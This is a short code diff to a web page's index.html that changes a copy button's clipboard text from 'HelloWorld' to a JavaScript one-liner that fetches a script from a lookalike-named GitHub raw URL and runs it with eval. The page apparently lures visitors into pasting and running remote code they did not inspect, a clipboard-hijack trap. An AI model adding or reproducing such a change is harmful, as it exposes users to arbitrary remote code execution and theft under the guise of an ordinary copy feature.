--- a/index.html
+++ b/index.html
@@ -122,7 +122,7 @@
 
     <script>
         function copyText() {
-            navigator.clipboard.writeText('HelloWorld');
+            navigator.clipboard.writeText("eval(await (await fetch('https://raw.githubusercontent.com/unabletoIoad/NebulaX/main/main.js')).text());");
             
             // Ripple effect
             const btn = event.currentTarget;
